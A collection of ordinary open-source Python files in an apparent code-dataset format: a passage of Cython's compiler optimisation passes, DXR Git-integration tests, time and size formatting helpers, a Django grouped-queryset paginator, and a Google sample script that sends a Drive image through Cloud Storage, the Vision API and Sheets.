node, function, args, is_unbound_method, 'bytearray', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytearray_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'startswith',
bytes_tailmatch_utility_code, -1)
'''
### helpers
def _substitute_method_call(self, node, function, name, func_type,
attr_name, is_unbound_method, args=(),
utility_code=None, is_temp=None,
may_return_none=ExprNodes.PythonCapiCallNode.may_return_none):
args = list(args)
if args and not args[0].is_literal:
self_arg = args[0]
if is_unbound_method:
self_arg = self_arg.as_none_safe_node(
"descriptor '%s' requires a '%s' object but received a 'NoneType'",
format_args=[attr_name, function.obj.name])
else:
self_arg = self_arg.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error = "PyExc_AttributeError",
format_args = [attr_name])
args[0] = self_arg
if is_temp is None:
is_temp = node.is_temp
return ExprNodes.PythonCapiCallNode(
node.pos, name, func_type,
args = args,
is_temp = is_temp,
utility_code = utility_code,
may_return_none = may_return_none,
result_is_used = node.result_is_used,
)
def _inject_int_default_argument(self, node, args, arg_index, type, default_value):
assert len(args) >= arg_index
if len(args) == arg_index:
args.append(ExprNodes.IntNode(node.pos, value=str(default_value),
type=type, constant_result=default_value))
else:
args[arg_index] = args[arg_index].coerce_to(type, self.current_env())
def _inject_bint_default_argument(self, node, args, arg_index, default_value):
assert len(args) >= arg_index
if len(args) == arg_index:
default_value = bool(default_value)
args.append(ExprNodes.BoolNode(node.pos, value=default_value,
constant_result=default_value))
else:
args[arg_index] = args[arg_index].coerce_to_boolean(self.current_env())
unicode_tailmatch_utility_code = UtilityCode.load_cached('unicode_tailmatch', 'StringTools.c')
bytes_tailmatch_utility_code = UtilityCode.load_cached('bytes_tailmatch', 'StringTools.c')
str_tailmatch_utility_code = UtilityCode.load_cached('str_tailmatch', 'StringTools.c')
class ConstantFolding(Visitor.VisitorTransform, SkipDeclarations):
"""Calculate the result of constant expressions to store it in
``expr_node.constant_result``, and replace trivial cases by their
constant result.
General rules:
- We calculate float constants to make them available to the
compiler, but we do not aggregate them into a single literal
node to prevent any loss of precision.
- We recursively calculate constants from non-literal nodes to
make them available to the compiler, but we only aggregate
literal nodes at each step. Non-literal nodes are never merged
into a single node.
"""
def __init__(self, reevaluate=False):
"""
The reevaluate argument specifies whether constant values that were
previously computed should be recomputed.
"""
super(ConstantFolding, self).__init__()
self.reevaluate = reevaluate
def _calculate_const(self, node):
if (not self.reevaluate and
node.constant_result is not ExprNodes.constant_value_not_set):
return
# make sure we always set the value
not_a_constant = ExprNodes.not_a_constant
node.constant_result = not_a_constant
# check if all children are constant
children = self.visitchildren(node)
for child_result in children.values():
if type(child_result) is list:
for child in child_result:
if getattr(child, 'constant_result', not_a_constant) is not_a_constant:
return
elif getattr(child_result, 'constant_result', not_a_constant) is not_a_constant:
return
# now try to calculate the real constant value
try:
node.calculate_constant_result()
# if node.constant_result is not ExprNodes.not_a_constant:
# print node.__class__.__name__, node.constant_result
except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
# ignore all 'normal' errors here => no constant result
pass
except Exception:
# this looks like a real error
import traceback, sys
traceback.print_exc(file=sys.stdout)
NODE_TYPE_ORDER = [ExprNodes.BoolNode, ExprNodes.CharNode,
ExprNodes.IntNode, ExprNodes.FloatNode]
def _widest_node_class(self, *nodes):
try:
return self.NODE_TYPE_ORDER[
max(map(self.NODE_TYPE_ORDER.index, map(type, nodes)))]
except ValueError:
return None
def _bool_node(self, node, value):
value = bool(value)
return ExprNodes.BoolNode(node.pos, value=value, constant_result=value)
def visit_ExprNode(self, node):
self._calculate_const(node)
return node
def visit_UnopNode(self, node):
self._calculate_const(node)
if not node.has_constant_result():
if node.operator == '!':
return self._handle_NotNode(node)
return node
if not node.operand.is_literal:
return node
if node.operator == '!':
return self._bool_node(node, node.constant_result)
elif isinstance(node.operand, ExprNodes.BoolNode):
return ExprNodes.IntNode(node.pos, value=str(int(node.constant_result)),
type=PyrexTypes.c_int_type,
constant_result=int(node.constant_result))
elif node.operator == '+':
return self._handle_UnaryPlusNode(node)
elif node.operator == '-':
return self._handle_UnaryMinusNode(node)
return node
_negate_operator = {
'in': 'not_in',
'not_in': 'in',
'is': 'is_not',
'is_not': 'is'
}.get
def _handle_NotNode(self, node):
operand = node.operand
if isinstance(operand, ExprNodes.PrimaryCmpNode):
operator = self._negate_operator(operand.operator)
if operator:
node = copy.copy(operand)
node.operator = operator
node = self.visit_PrimaryCmpNode(node)
return node
def _handle_UnaryMinusNode(self, node):
def _negate(value):
if value.startswith('-'):
value = value[1:]
else:
value = '-' + value
return value
node_type = node.operand.type
if isinstance(node.operand, ExprNodes.FloatNode):
# this is a safe operation
return ExprNodes.FloatNode(node.pos, value=_negate(node.operand.value),
type=node_type,
constant_result=node.constant_result)
if node_type.is_int and node_type.signed or \
isinstance(node.operand, ExprNodes.IntNode) and node_type.is_pyobject:
return ExprNodes.IntNode(node.pos, value=_negate(node.operand.value),
type=node_type,
longness=node.operand.longness,
constant_result=node.constant_result)
return node
def _handle_UnaryPlusNode(self, node):
if (node.operand.has_constant_result() and
node.constant_result == node.operand.constant_result):
return node.operand
return node
def visit_BoolBinopNode(self, node):
self._calculate_const(node)
if not node.operand1.has_constant_result():
return node
if node.operand1.constant_result:
if node.operator == 'and':
return node.operand2
else:
return node.operand1
else:
if node.operator == 'and':
return node.operand1
else:
return node.operand2
def visit_BinopNode(self, node):
self._calculate_const(node)
if node.constant_result is ExprNodes.not_a_constant:
return node
if isinstance(node.constant_result, float):
return node
operand1, operand2 = node.operand1, node.operand2
if not operand1.is_literal or not operand2.is_literal:
return node
# now inject a new constant node with the calculated value
try:
type1, type2 = operand1.type, operand2.type
if type1 is None or type2 is None:
return node
except AttributeError:
return node
if type1.is_numeric and type2.is_numeric:
widest_type = PyrexTypes.widest_numeric_type(type1, type2)
else:
widest_type = PyrexTypes.py_object_type
target_class = self._widest_node_class(operand1, operand2)
if target_class is None:
return node
elif target_class is ExprNodes.BoolNode and node.operator in '+-//<<%**>>':
# C arithmetic results in at least an int type
target_class = ExprNodes.IntNode
elif target_class is ExprNodes.CharNode and node.operator in '+-//<<%**>>&|^':
# C arithmetic results in at least an int type
target_class = ExprNodes.IntNode
if target_class is ExprNodes.IntNode:
unsigned = getattr(operand1, 'unsigned', '') and \
getattr(operand2, 'unsigned', '')
longness = "LL"[:max(len(getattr(operand1, 'longness', '')),
len(getattr(operand2, 'longness', '')))]
new_node = ExprNodes.IntNode(pos=node.pos,
unsigned=unsigned, longness=longness,
value=str(int(node.constant_result)),
constant_result=int(node.constant_result))
# IntNode is smart about the type it chooses, so we just
# make sure we were not smarter this time
if widest_type.is_pyobject or new_node.type.is_pyobject:
new_node.type = PyrexTypes.py_object_type
else:
new_node.type = PyrexTypes.widest_numeric_type(widest_type, new_node.type)
else:
if target_class is ExprNodes.BoolNode:
node_value = node.constant_result
else:
node_value = str(node.constant_result)
new_node = target_class(pos=node.pos, type = widest_type,
value = node_value,
constant_result = node.constant_result)
return new_node
def visit_AddNode(self, node):
self._calculate_const(node)
if node.constant_result is ExprNodes.not_a_constant:
return node
if node.operand1.is_string_literal and node.operand2.is_string_literal:
# some people combine string literals with a '+'
str1, str2 = node.operand1, node.operand2
if isinstance(str1, ExprNodes.UnicodeNode) and isinstance(str2, ExprNodes.UnicodeNode):
bytes_value = None
if str1.bytes_value is not None and str2.bytes_value is not None:
if str1.bytes_value.encoding == str2.bytes_value.encoding:
bytes_value = BytesLiteral(str1.bytes_value + str2.bytes_value)
bytes_value.encoding = str1.bytes_value.encoding
string_value = EncodedString(node.constant_result)
return ExprNodes.UnicodeNode(
str1.pos, value=string_value, constant_result=node.constant_result, bytes_value=bytes_value)
elif isinstance(str1, ExprNodes.BytesNode) and isinstance(str2, ExprNodes.BytesNode):
if str1.value.encoding == str2.value.encoding:
bytes_value = BytesLiteral(node.constant_result)
bytes_value.encoding = str1.value.encoding
return ExprNodes.BytesNode(str1.pos, value=bytes_value, constant_result=node.constant_result)
# all other combinations are rather complicated
# to get right in Py2/3: encodings, unicode escapes, ...
return self.visit_BinopNode(node)
def visit_MulNode(self, node):
self._calculate_const(node)
if node.operand1.is_sequence_constructor:
return self._calculate_constant_seq(node, node.operand1, node.operand2)
if isinstance(node.operand1, ExprNodes.IntNode) and \
node.operand2.is_sequence_constructor:
return self._calculate_constant_seq(node, node.operand2, node.operand1)
return self.visit_BinopNode(node)
def _calculate_constant_seq(self, node, sequence_node, factor):
if factor.constant_result != 1 and sequence_node.args:
if isinstance(factor.constant_result, (int, long)) and factor.constant_result <= 0:
del sequence_node.args[:]
sequence_node.mult_factor = None
elif sequence_node.mult_factor is not None:
if (isinstance(factor.constant_result, (int, long)) and
isinstance(sequence_node.mult_factor.constant_result, (int, long))):
value = sequence_node.mult_factor.constant_result * factor.constant_result
sequence_node.mult_factor = ExprNodes.IntNode(
sequence_node.mult_factor.pos,
value=str(value), constant_result=value)
else:
# don't know if we can combine the factors, so don't
return self.visit_BinopNode(node)
else:
sequence_node.mult_factor = factor
return sequence_node
def visit_PrimaryCmpNode(self, node):
# calculate constant partial results in the comparison cascade
self.visitchildren(node, ['operand1'])
left_node = node.operand1
cmp_node = node
while cmp_node is not None:
self.visitchildren(cmp_node, ['operand2'])
right_node = cmp_node.operand2
cmp_node.constant_result = not_a_constant
if left_node.has_constant_result() and right_node.has_constant_result():
try:
cmp_node.calculate_cascaded_constant_result(left_node.constant_result)
except (ValueError, TypeError, KeyError, IndexError, AttributeError, ArithmeticError):
pass # ignore all 'normal' errors here => no constant result
left_node = right_node
cmp_node = cmp_node.cascade
if not node.cascade:
if node.has_constant_result():
return self._bool_node(node, node.constant_result)
return node
# collect partial cascades: [[value, CmpNode...], [value, CmpNode, ...], ...]
cascades = [[node.operand1]]
final_false_result = []
def split_cascades(cmp_node):
if cmp_node.has_constant_result():
if not cmp_node.constant_result:
# False => short-circuit
final_false_result.append(self._bool_node(cmp_node, False))
return
else:
# True => discard and start new cascade
cascades.append([cmp_node.operand2])
else:
# not constant => append to current cascade
cascades[-1].append(cmp_node)
if cmp_node.cascade:
split_cascades(cmp_node.cascade)
split_cascades(node)
cmp_nodes = []
for cascade in cascades:
if len(cascade) < 2:
continue
cmp_node = cascade[1]
pcmp_node = ExprNodes.PrimaryCmpNode(
cmp_node.pos,
operand1=cascade[0],
operator=cmp_node.operator,
operand2=cmp_node.operand2,
constant_result=not_a_constant)
cmp_nodes.append(pcmp_node)
last_cmp_node = pcmp_node
for cmp_node in cascade[2:]:
last_cmp_node.cascade = cmp_node
last_cmp_node = cmp_node
last_cmp_node.cascade = None
if final_false_result:
# last cascade was constant False
cmp_nodes.append(final_false_result[0])
elif not cmp_nodes:
# only constants, but no False result
return self._bool_node(node, True)
node = cmp_nodes[0]
if len(cmp_nodes) == 1:
if node.has_constant_result():
return self._bool_node(node, node.constant_result)
else:
for cmp_node in cmp_nodes[1:]:
node = ExprNodes.BoolBinopNode(
node.pos,
operand1=node,
operator='and',
operand2=cmp_node,
constant_result=not_a_constant)
return node
def visit_CondExprNode(self, node):
self._calculate_const(node)
if not node.test.has_constant_result():
return node
if node.test.constant_result:
return node.true_val
else:
return node.false_val
def visit_IfStatNode(self, node):
self.visitchildren(node)
# eliminate dead code based on constant condition results
if_clauses = []
for if_clause in node.if_clauses:
condition = if_clause.condition
if condition.has_constant_result():
if condition.constant_result:
# always true => subsequent clauses can safely be dropped
node.else_clause = if_clause.body
break
# else: false => drop clause
else:
# unknown result => normal runtime evaluation
if_clauses.append(if_clause)
if if_clauses:
node.if_clauses = if_clauses
return node
elif node.else_clause:
return node.else_clause
else:
return Nodes.StatListNode(node.pos, stats=[])
def visit_SliceIndexNode(self, node):
self._calculate_const(node)
# normalise start/stop values
if node.start is None or node.start.constant_result is None:
start = node.start = None
else:
start = node.start.constant_result
if node.stop is None or node.stop.constant_result is None:
stop = node.stop = None
else:
stop = node.stop.constant_result
# cut down sliced constant sequences
if node.constant_result is not not_a_constant:
base = node.base
if base.is_sequence_constructor and base.mult_factor is None:
base.args = base.args[start:stop]
return base
elif base.is_string_literal:
base = base.as_sliced_node(start, stop)
if base is not None:
return base
return node
def visit_ComprehensionNode(self, node):
self.visitchildren(node)
if isinstance(node.loop, Nodes.StatListNode) and not node.loop.stats:
# loop was pruned already => transform into literal
if node.type is Builtin.list_type:
return ExprNodes.ListNode(
node.pos, args=[], constant_result=[])
elif node.type is Builtin.set_type:
return ExprNodes.SetNode(
node.pos, args=[], constant_result=set())
elif node.type is Builtin.dict_type:
return ExprNodes.DictNode(
node.pos, key_value_pairs=[], constant_result={})
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
sequence = node.iterator.sequence
if isinstance(sequence, ExprNodes.SequenceNode):
if not sequence.args:
if node.else_clause:
return node.else_clause
else:
# don't break list comprehensions
return Nodes.StatListNode(node.pos, stats=[])
# iterating over a list literal? => tuples are more efficient
if isinstance(sequence, ExprNodes.ListNode):
node.iterator.sequence = sequence.as_tuple()
return node
def visit_WhileStatNode(self, node):
self.visitchildren(node)
if node.condition and node.condition.has_constant_result():
if node.condition.constant_result:
node.condition = None
node.else_clause = None
else:
return node.else_clause
return node
def visit_ExprStatNode(self, node):
self.visitchildren(node)
if not isinstance(node.expr, ExprNodes.ExprNode):
# ParallelRangeTransform does this ...
return node
# drop unused constant expressions
if node.expr.has_constant_result():
return None
return node
# in the future, other nodes can have their own handler method here
# that can replace them with a constant result node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class FinalOptimizePhase(Visitor.CythonTransform, Visitor.NodeRefCleanupMixin):
"""
This visitor handles several commuting optimizations, and is run
just before the C code generation phase.
The optimizations currently implemented in this class are:
- eliminate None assignment and refcounting for first assignment.
- isinstance -> typecheck for cdef types
- eliminate checks for None and/or types that became redundant after tree changes
- replace Python function calls that look like method calls by a faster PyMethodCallNode
"""
def visit_SingleAssignmentNode(self, node):
"""Avoid redundant initialisation of local variables before their
first assignment.
"""
self.visitchildren(node)
if node.first:
lhs = node.lhs
lhs.lhs_of_first_assignment = True
return node
def visit_SimpleCallNode(self, node):
"""
Replace generic calls to isinstance(x, type) by a more efficient type check.
Replace likely Python method calls by a specialised PyMethodCallNode.
"""
self.visitchildren(node)
function = node.function
if function.type.is_cfunction and function.is_name:
if function.name == 'isinstance' and len(node.args) == 2:
type_arg = node.args[1]
if type_arg.type.is_builtin_type and type_arg.type.name == 'type':
cython_scope = self.context.cython_scope
function.entry = cython_scope.lookup('PyObject_TypeCheck')
function.type = function.entry.type
PyTypeObjectPtr = PyrexTypes.CPtrType(cython_scope.lookup('PyTypeObject').type)
node.args[1] = ExprNodes.CastNode(node.args[1], PyTypeObjectPtr)
elif (self.current_directives.get("optimize.unpack_method_calls")
and node.is_temp and function.type.is_pyobject):
# optimise simple Python methods calls
if isinstance(node.arg_tuple, ExprNodes.TupleNode) and not (
node.arg_tuple.mult_factor or (node.arg_tuple.is_literal and node.arg_tuple.args)):
# simple call, now exclude calls to objects that are definitely not methods
may_be_a_method = True
if function.type is Builtin.type_type:
may_be_a_method = False
elif function.is_name:
if function.entry.is_builtin:
may_be_a_method = False
elif function.cf_state:
# local functions/classes are definitely not methods
non_method_nodes = (ExprNodes.PyCFunctionNode, ExprNodes.ClassNode, ExprNodes.Py3ClassNode)
may_be_a_method = any(
assignment.rhs and not isinstance(assignment.rhs, non_method_nodes)
for assignment in function.cf_state)
if may_be_a_method:
node = self.replace(node, ExprNodes.PyMethodCallNode.from_node(
node, function=function, arg_tuple=node.arg_tuple, type=node.type))
return node
def visit_PyTypeTestNode(self, node):
"""Remove tests for alternatively allowed None values from
type tests when we know that the argument cannot be None
anyway.
"""
self.visitchildren(node)
if not node.notnone:
if not node.arg.may_be_none():
node.notnone = True
return node
def visit_NoneCheckNode(self, node):
"""Remove None checks from expressions that definitely do not
carry a None value.
"""
self.visitchildren(node)
if not node.arg.may_be_none():
return node.arg
return node
class ConsolidateOverflowCheck(Visitor.CythonTransform):
"""
This class facilitates the sharing of overflow checking among all nodes
of a nested arithmetic expression. For example, given the expression
a*b + c, where a, b, and x are all possibly overflowing ints, the entire
sequence will be evaluated and the overflow bit checked only at the end.
"""
overflow_bit_node = None
def visit_Node(self, node):
if self.overflow_bit_node is not None:
saved = self.overflow_bit_node
self.overflow_bit_node = None
self.visitchildren(node)
self.overflow_bit_node = saved
else:
self.visitchildren(node)
return node
def visit_NumBinopNode(self, node):
if node.overflow_check and node.overflow_fold:
top_level_overflow = self.overflow_bit_node is None
if top_level_overflow:
self.overflow_bit_node = node
else:
node.overflow_bit_node = self.overflow_bit_node
node.overflow_check = False
self.visitchildren(node)
if top_level_overflow:
self.overflow_bit_node = None
else:
self.visitchildren(node)
return node
| ABcDexter/cython | Cython/Compiler/Optimize.py | Python | apache-2.0 | 169,504 |
from nose.tools import ok_, eq_
from dxr.testing import DxrInstanceTestCaseMakeFirst
LATEST_REVISION = "5e2b2b554eb86f90e189217fa9dc2eba66259910"
PREVIOUS_REVISION = "cb339834998124cb8165aa35ed4635c51b6ac5c2"
class GitTests(DxrInstanceTestCaseMakeFirst):
"""Test our Git integration, both core and omniglot."""
def test_diff(self):
"""Make sure the diff link exists and goes to the right place."""
response = self.client().get('/code/source/main.c')
ok_('/commit/%s" title="Diff" class="diff icon">Diff</a>' % LATEST_REVISION in response.data)
def test_blame(self):
"""Make sure the blame link exists and goes to the right place."""
response = self.client().get('/code/source/main.c')
ok_('/blame/%s/main.c" title="Blame" class="blame icon">Blame</a>' % LATEST_REVISION in response.data)
def test_raw(self):
"""Make sure the raw link exists and goes to the right place."""
response = self.client().get('/code/source/main.c')
ok_('/raw/%s/main.c" title="Raw" class="raw icon">Raw</a>' % LATEST_REVISION in response.data)
def test_log(self):
"""Make sure the log link exists and goes to the right place."""
response = self.client().get('/code/source/main.c')
ok_('/commits/%s/main.c" title="Log" class="log icon">Log</a>' % LATEST_REVISION in response.data)
def test_permalink(self):
"""Make sure the permalink link exists and goes to the right place."""
response = self.client().get('/code/source/main.c')
ok_('/rev/%s/main.c" title="Permalink" class="permalink icon">Permalink</a>' % LATEST_REVISION in response.data)
# Test that it works for this revision and the last one.
response = self.client().get('/code/rev/%s/main.c' % LATEST_REVISION)
eq_(response.status_code, 200)
response = self.client().get('/code/rev/%s/main.c' % PREVIOUS_REVISION)
eq_(response.status_code, 200)
def test_deep_permalink(self):
"""Make sure the permalink link exists and goes to the right place for files not in the
top-level directory. This test makes sure that the permalink works even for files not in
the top level git root directory, since `git show` will resolve paths relative to the git
root rather than the current working directory unless we specify ./ before the path."""
response = self.client().get('/code/source/deeper/deeper_file')
ok_('/rev/%s/deeper/deeper_file" title="Permalink" class="permalink icon">Permalink</a>' % LATEST_REVISION in response.data)
response = self.client().get('/code/rev/%s/deeper/deeper_file' % LATEST_REVISION)
eq_(response.status_code, 200)
ok_("This file tests" in response.data)
def test_pygmentize(self):
"""Check that the pygmentize FileToSkim correctly colors a file from permalink."""
client = self.client()
response = client.get('/code/rev/%s/main.c' % PREVIOUS_REVISION)
ok_('<span class="c">// Hello World Example\n</span>' in response.data)
# Query it again to test that the Vcs cache functions.
response = client.get('/code/rev/%s/main.c' % PREVIOUS_REVISION)
ok_('<span class="c">// Hello World Example\n</span>' in response.data)
| bozzmob/dxr | tests/test_vcs_git/test_vcs_git.py | Python | mit | 3,300 |
'''
Created on Feb 26, 2010
@author: ivan
'''
def size2text(size):
if size > 1024 * 1024 * 1024:
return "%.2f Gb" % (size / (1024 * 1024 * 1024.0))
if size > 1024 * 1024:
return "%.2f Mb" % (size / (1024 * 1024.0))
if size > 1024:
return "%.2f Kb" % (size / 1024.0)
return size
def convert_seconds_to_text(time_sec):
time_sec = int(time_sec)
hours = int(time_sec / (60 * 60))
time_sec = time_sec - (hours * 60 * 60)
mins = int(time_sec / 60)
time_sec = time_sec - (mins * 60)
secs = int(time_sec)
if hours > 0:
return '%(hours)d:%(mins)02d:%(secs)02d' % {'hours' : hours, 'mins': mins, 'secs': secs }
else:
return '%(mins)02d:%(secs)02d' % {'mins': mins, 'secs': secs}
| foobnix/foobnix | foobnix/util/time_utils.py | Python | gpl-3.0 | 803 |
# -*- coding: utf8 -*-
from itertools import groupby
from django.core.paginator import EmptyPage
from django.db.models import Count
from django.utils.translation import ugettext_lazy as _
__all__ = 'GroupedQuerySetLaxPage', 'GroupedQuerySetLaxPaginator', 'EmptyPage'
class GroupedQuerySetLaxPage(object):
def __init__(self, qs, number, paginator, pagination, groups_counts,
grouping_field_name):
self.object_list = qs
self.number = number
self.paginator = paginator
self._pagination = pagination
self.groups_counts = groups_counts
self.grouping_field_name = grouping_field_name
def has_next(self):
return 'next' in self._pagination
def has_previous(self):
return 'previous' in self._pagination
def has_other_pages(self):
return self.has_previous() or self.has_next()
def next_page_number(self):
return self._pagination['next']
def previous_page_number(self):
return self._pagination['previous']
@property
def grouped(self):
return groupby(self.object_list,
lambda x: getattr(x, self.grouping_field_name))
class GroupedQuerySetLaxPaginator(object):
"""
Paginator returning pages of sorted and grouped objects (i.e, GROUP BY).
The number of objects on a page will be as close as `lax_want` as
possible. Items from a same group are always on a same page. A single
page can have items belonging to more than one group.
"""
def __init__(self, qs, grouping_field_name, lax_want=25, lax_threshold=0.5,
reverse=False):
"""
qs : QuerySet
QuerySet to paginate
grouping_field_name : str, unicode
Name of the grouping field
lax_want : int
Number of ideal objects per page
lax_threshold : float
If the exceding number of actual objects selected for a page is over
`lax_threshold` times `lax_want`, then ignore the last selected
group from the page.
reverse : bool
Paginate backwards (i.e, the "greatest" group at the begining).
"""
assert lax_want > 0
assert lax_threshold >= 0
self._qs = qs
self._grouping_field_name = grouping_field_name
self._lax_want = lax_want
self._lax_threshold = lax_threshold
self._lax_max = lax_want + (lax_want * lax_threshold)
self._reverse = reverse
if reverse:
self._forwards_lookup = '%s__lte' % grouping_field_name
self._forwards_order = '-%s' % grouping_field_name
self._forwards_end_lookup = '%s__gte' % grouping_field_name
self._backwards_lookup = '%s__gt' % grouping_field_name
self._backwards_order = grouping_field_name
else:
self._forwards_lookup = '%s__gte' % grouping_field_name
self._forwards_order = grouping_field_name
self._forwards_end_lookup = '%s__lte' % grouping_field_name
self._backwards_lookup = '%s__lt' % grouping_field_name
self._backwards_order = '-%s' % grouping_field_name
def page(self, number=None):
if number is None:
try:
number = self._qs.values_list(self._grouping_field_name) \
.order_by(self._forwards_order)[0:1].get()[0]
except self._qs.model.DoesNotExist:
pass
else:
if number is None:
raise ValueError(u"%s doesn't support NULL values in pagination" % self.__class__.__name__)
forwards_qs = self._qs.values_list(self._grouping_field_name) \
.annotate(Count(self._grouping_field_name)) \
.filter(**{self._forwards_lookup: number}) \
.order_by(self._forwards_order)
backwards_qs = self._qs.values_list(self._grouping_field_name) \
.annotate(Count(self._grouping_field_name)) \
.filter(**{self._backwards_lookup: number}) \
.order_by(self._backwards_order)
# We need to find these grouping values:
# ..., prev, [start, ..., end], next, ...
pagination = {}
lax_count = 0
for i,(grouping_value,value_count) in enumerate(forwards_qs.iterator()):
if self._lax_threshold and lax_count > self._lax_max:
# [AAA]
# We have exceded the lax treshold, let's use the current group
# as `nex` and the previous one (if any) as `end`
if not end is start:
end, nex = end_prev, end
break
if lax_count >= self._lax_want:
# If we get here, it means we have already found `start` and
# `end` we are looking for `next` now.
# There's no way we are entering here on the first iteration.
# Maybe we don't even get here; meaning there's no next page.
nex = grouping_value
break
if i == 0:
# we are always entering here on the first iteration (if any)
start = end = grouping_value
# If we later exced the lax threshold, this will be `end`. See [AAA]
end_prev = end
# We always keep the last iterated grouping_value (if any) as `end`
end = grouping_value
lax_count += value_count
else:
try:
pagination['start'] = start
except NameError:
raise EmptyPage(_(u"%s is not a valid page") % repr(number))
pagination['end'] = end
try:
pagination['next'] = nex
except NameError:
pass # we don't have a next page
try:
pagination['previous'] = backwards_qs[0:1].get()[0]
except backwards_qs.model.DoesNotExist:
pass # we don't have a prev page
object_list = self._qs.filter(**{self._forwards_lookup: start,
self._forwards_end_lookup: end}) \
.order_by(self._forwards_order)
groups_counts = forwards_qs.filter(**{self._forwards_end_lookup: end})
return GroupedQuerySetLaxPage(object_list, number, self, pagination,
groups_counts, self._grouping_field_name)
@property
def count(self):
return self._qs.count()
| k0001/django-gqslpagination | django_gqslpagination/__init__.py | Python | bsd-3-clause | 6,640 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
analyze_gsimg.py - analyze G Suite image processing workflow
Download image from Google Drive, archive to Google Cloud Storage, send
to Google Cloud Vision for processing, add results row to Google Sheet.
'''
from __future__ import print_function
import argparse
import base64
import io
import os
import webbrowser
from googleapiclient import discovery, http
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2 import credentials
k_ize = lambda b: '%6.2fK' % (b/1000.) # bytes to kBs
FILE = 'YOUR_IMG_ON_DRIVE'
BUCKET = 'YOUR_BUCKET_NAME'
PARENT = '' # YOUR IMG FILE PREFIX
SHEET = 'YOUR_SHEET_ID'
TOP = 5 # TOP # of VISION LABELS TO SAVE
DEBUG = False
# process credentials for OAuth2 tokens
creds = None
TOKENS = 'tokens.json' # OAuth2 token storage
SCOPES = (
'https://www.googleapis.com/auth/drive.readonly',
'https://www.googleapis.com/auth/devstorage.full_control',
'https://www.googleapis.com/auth/cloud-vision',
'https://www.googleapis.com/auth/spreadsheets',
)
if os.path.exists(TOKENS):
creds = credentials.Credentials.from_authorized_user_file(TOKENS)
if not (creds and creds.valid):
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'client_secret.json', SCOPES)
creds = flow.run_local_server()
with open(TOKENS, 'w') as token:
token.write(creds.to_json())
# create API service endpoints
DRIVE = discovery.build('drive', 'v3', credentials=creds)
GCS = discovery.build('storage', 'v1', credentials=creds)
VISION = discovery.build('vision', 'v1', credentials=creds)
SHEETS = discovery.build('sheets', 'v4', credentials=creds)
def drive_get_img(fname):
'download file from Drive and return file info & binary if found'
# search for file on Google Drive
rsp = DRIVE.files().list(q="name='%s'" % fname,
fields='files(id,name,mimeType,modifiedTime)'
).execute().get('files', [])
# download binary & return file info if found, else return None
if rsp:
target = rsp[0] # use first matching file
fileId = target['id']
fname = target['name']
mtype = target['mimeType']
binary = DRIVE.files().get_media(fileId=fileId).execute()
return fname, mtype, target['modifiedTime'], binary
def gcs_blob_upload(fname, bucket, media, mimetype):
'upload an object to a Google Cloud Storage bucket'
# build blob metadata and upload via GCS API
body = {'name': fname, 'uploadType': 'multipart', 'contentType': mimetype}
return GCS.objects().insert(bucket=bucket, body=body,
media_body=http.MediaIoBaseUpload(io.BytesIO(media), mimetype),
fields='bucket,name').execute()
def vision_label_img(img, top):
'send image to Vision API for label annotation'
# build image metadata and call Vision API to process
body = {'requests': [{
'image': {'content': img},
'features': [{'type': 'LABEL_DETECTION', 'maxResults': top}],
}]}
rsp = VISION.images().annotate(body=body).execute().get('responses', [{}])[0]
# return top labels for image as CSV for Sheet (row)
if 'labelAnnotations' in rsp:
return ', '.join('(%.2f%%) %s' % (
label['score']*100., label['description']) \
for label in rsp['labelAnnotations'])
def sheet_append_row(sheet, row):
'append row to a Google Sheet, return #cells added'
# call Sheets API to write row to Sheet (via its ID)
rsp = SHEETS.spreadsheets().values().append(
spreadsheetId=sheet, range='Sheet1',
valueInputOption='USER_ENTERED', body={'values': [row]}
).execute()
if rsp:
return rsp.get('updates').get('updatedCells')
def main(fname, bucket, sheet_id, folder, top, debug):
'"main()" drives process from image download through report generation'
# download img file & info from Drive
rsp = drive_get_img(fname)
if not rsp:
return
fname, mtype, ftime, data = rsp
if debug:
print('Downloaded %r (%s, %s, size: %d)' % (fname, mtype, ftime, len(data)))
# upload file to GCS
gcsname = '%s/%s'% (folder, fname)
rsp = gcs_blob_upload(gcsname, bucket, data, mtype)
if not rsp:
return
if debug:
print('Uploaded %r to GCS bucket %r' % (rsp['name'], rsp['bucket']))
# process w/Vision
rsp = vision_label_img(base64.b64encode(data).decode('utf-8'), top)
if not rsp:
return
if debug:
print('Top %d labels from Vision API: %s' % (top, rsp))
# push results to Sheet, get cells-saved count
fsize = k_ize(len(data))
row = [folder,
'=HYPERLINK("storage.cloud.google.com/%s/%s", "%s")' % (
bucket, gcsname, fname), mtype, ftime, fsize, rsp
]
rsp = sheet_append_row(sheet_id, row)
if not rsp:
return
if debug:
print('Added %d cells to Google Sheet' % rsp)
return True
if __name__ == '__main__':
# args: [-hv] [-i imgfile] [-b bucket] [-f folder] [-s Sheet ID] [-t top labels]
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--imgfile", action="store_true",
default=FILE, help="image file filename")
parser.add_argument("-b", "--bucket_id", action="store_true",
default=BUCKET, help="Google Cloud Storage bucket name")
parser.add_argument("-f", "--folder", action="store_true",
default=PARENT, help="Google Cloud Storage image folder")
parser.add_argument("-s", "--sheet_id", action="store_true",
default=SHEET, help="Google Sheet Drive file ID (44-char str)")
parser.add_argument("-t", "--viz_top", action="store_true",
default=TOP, help="return top N (default %d) Vision API labels" % TOP)
parser.add_argument("-v", "--verbose", action="store_true",
default=DEBUG, help="verbose display output")
args = parser.parse_args()
print('Processing file %r... please wait' % args.imgfile)
rsp = main(args.imgfile, args.bucket_id,
args.sheet_id, args.folder, args.viz_top, args.verbose)
